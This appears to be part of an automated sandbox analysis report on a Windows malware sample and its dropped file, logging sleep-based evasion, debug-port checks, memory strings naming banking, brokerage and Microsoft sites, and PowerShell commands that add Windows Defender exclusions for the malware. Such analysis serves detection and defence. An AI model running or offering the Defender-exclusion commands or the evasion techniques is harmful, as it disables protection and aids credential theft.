Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8041	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1580	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7645	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1758	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Window / User API: threadDelayed 2164	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Window / User API: threadDelayed 7654	Jump to behavior

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 1488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7664	Thread sleep count: 2164 > 30	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -599796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7664	Thread sleep count: 7654 > 30	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -599235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe TID: 7432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599796	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllicat>
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Code function: 9_2_06B69590 LdrInitializeThunk,

9_2_06B69590

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"
